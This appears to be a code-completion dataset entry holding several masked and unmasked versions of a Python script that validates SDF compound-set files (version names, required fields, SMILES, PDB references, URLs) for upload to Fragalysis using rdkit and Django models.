'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
<mask token>
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
<mask token>
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
<mask token>
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
<mask token>
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
<mask token>
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
test_fp = mol.GetProp('ref_pdb')
if zfile:
pdb_option = mol.GetProp('ref_pdb')
if zfile:
if pdb_option not in zfile['zf_list']:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_pdb', warning_string='path ' + str
(pdb_option) +
" can't be found in uploaded zip file (list: " + str(
zfile['zf_list']) + ')', validate_dict=validate_dict)
if target and not test_fp.endswith('.pdb'):
query = Protein.objects.filter(code__contains=str(target + '-' +
test_fp))
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb', warning_string='pdb for ' + str(test_fp) +
' does not exist in fragalysis', validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key, warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| <mask token>
version = 'ver_1.2'
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
def check_sdf(sdf_file, validate_dict):
"""
Checks if .sdf file can be read and follows naming format:
'compound-set_<name>.sdf' with <name> replaced with
the name you wish to give it. e.g. compound-set_fragmenstein.sdf
:sdf_file: is the sdf in the specified format
:return: Updates validate dictionary with pass/fail message
"""
if sdf_file.startswith('compound-set_') and sdf_file.endswith('.sdf'
) is False:
validate_dict = add_warning(molecule_name='File error', field=
'_File_name', warning_string='illegal filename: ' + str(
sdf_file) + ' found', validate_dict=validate_dict)
return validate_dict
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
test_fp = mol.GetProp('ref_pdb')
if zfile:
pdb_option = mol.GetProp('ref_pdb')
if zfile:
if pdb_option not in zfile['zf_list']:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_pdb', warning_string='path ' + str
(pdb_option) +
" can't be found in uploaded zip file (list: " + str(
zfile['zf_list']) + ')', validate_dict=validate_dict)
if target and not test_fp.endswith('.pdb'):
query = Protein.objects.filter(code__contains=str(target + '-' +
test_fp))
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb', warning_string='pdb for ' + str(test_fp) +
' does not exist in fragalysis', validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key, warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 13:19:51 2020
@author: Warren
Script to check sdf file format for Fragalysis upload
"""
from rdkit import Chem
import validators
import numpy as np
import os
from viewer.models import Protein, CompoundSet
import datetime
# Set .sdf format version here
version = 'ver_1.2'
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp('submitter_name'),
'submitter__email': description_mol.GetProp('submitter_email'),
'submitter__institution': description_mol.GetProp('submitter_institution'),
'submitter__generation_date': datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query)!=0:
validate_dict = add_warning(molecule_name='File error',
field='compound set',
warning_string="a compound set with the auto_generated name " + query[0].submitter.unique_name + " already exists (change method name in blank mol method field)",
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
def check_sdf(sdf_file, validate_dict):
"""
Checks if .sdf file can be read and follows naming format:
'compound-set_<name>.sdf' with <name> replaced with
the name you wish to give it. e.g. compound-set_fragmenstein.sdf
:sdf_file: is the sdf in the specified format
:return: Updates validate dictionary with pass/fail message
"""
# Check filename
if sdf_file.startswith("compound-set_") and sdf_file.endswith(".sdf") is False:
validate_dict = add_warning(molecule_name='File error',
field='_File_name',
warning_string="illegal filename: " + str(sdf_file) + " found",
validate_dict=validate_dict)
return validate_dict
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' + ref.strip())
if len(query)==0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_mol',
warning_string="molecule for " + str(ref.strip()) + " does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)",
validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check if pdb filepath given and exists
test_fp = mol.GetProp('ref_pdb')
# {'zip_obj': zf, 'zf_list': zip_names}
if zfile:
pdb_option = mol.GetProp('ref_pdb')
# name = pdb_option.split('/')[-1]
if zfile:
if pdb_option not in zfile['zf_list']:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb',
warning_string="path " + str(pdb_option) + " can't be found in uploaded zip file (list: " + str(zfile['zf_list']) + ")",
validate_dict=validate_dict)
# else:
if target and not test_fp.endswith(".pdb"):
query = Protein.objects.filter(code__contains=str(target + '-' + test_fp))
if len(query)==0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb',
warning_string="pdb for " + str(test_fp) + " does not exist in fragalysis",
validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check SMILES
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES',
warning_string="invalid SMILES %s" % (smi_check,),
validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field='_Name',
warning_string='illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
# check for compulsory fields in blank mols
fields = ['ref_url', 'submitter_name', 'submitter_email', 'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check if properties populated
property_dict = blank_mol.GetPropsAsDict()
# Properties to ignore
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field=key,
warning_string='description for %s missing' % (key,),
validate_dict=validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field=key,
warning_string='illegal URL %s provided' % (value,),
validate_dict=validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
# Compuslory fields
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key,
warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name,
field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field,
warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
# check for missing fields
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [],
'field': [],
'warning_string': []}
# Check sdf filename & can be read
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol',
field='N/A',
warning_string='your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done',
validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
# all mol checks
# - all mols have the same properties
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'),
field='property (missing)',
warning_string='%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
# Check version in blank mol
validate_dict = check_ver_name(blank_mol, version, validate_dict)
# Check compuslory fields in blank mol props
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
# Check properties have been described and validate url
validate_dict = check_blank_prop(blank_mol, validate_dict)
# main mols checks
# - missing compulsary fields
# - check name characters
# - check pdb assignment and if pdb filepath exists
# - check compulsory field populated
# - check SMILES can be opended by rdkit
# (check api for pdb if fragalysis)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| [
9,
10,
14,
16,
18
] |
655 | 48bc5d4b191fa631650b60240560dbece6396312 | <mask token>
| <mask token>
while cantidad <= 0:
